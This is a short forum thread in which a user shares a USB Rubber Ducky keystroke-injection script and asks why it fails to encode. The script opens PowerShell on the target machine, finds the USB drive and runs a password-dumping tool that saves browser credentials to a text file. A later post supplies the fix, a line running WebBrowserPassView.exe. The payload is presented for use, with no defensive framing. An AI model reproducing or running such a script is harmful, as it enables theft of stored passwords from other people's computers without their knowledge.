JayDubFella Posted September 18, 2016 Posted September 18, 2016 I'm seeking to encode a script that I found on the internet, using the online DuckToolKit encoder, that will generate a text file on the usb rubber ducky (twin duck) for passwords/credentials, and hit an error on line 14 in the syntax of the script. Any suggestions? DELAY 1000 GUI R DELAY 100 STRING powershell DELAY 100 ENTER DELAY 1000 STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'D' } | select name DELAY 100 ENTER STRING cd $usbPath.name DELAY 100 ENTER STRING ./p /stext password.txt DELAY 100 ENTER STRING exit DELAY 100 ENTER Quote
JayDubFella Posted September 18, 2016 Author Posted September 18, 2016 @orcun99889 follow the below video and change line 14 to: STRING .\WebBrowserPassView.exe /stext password.txt Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.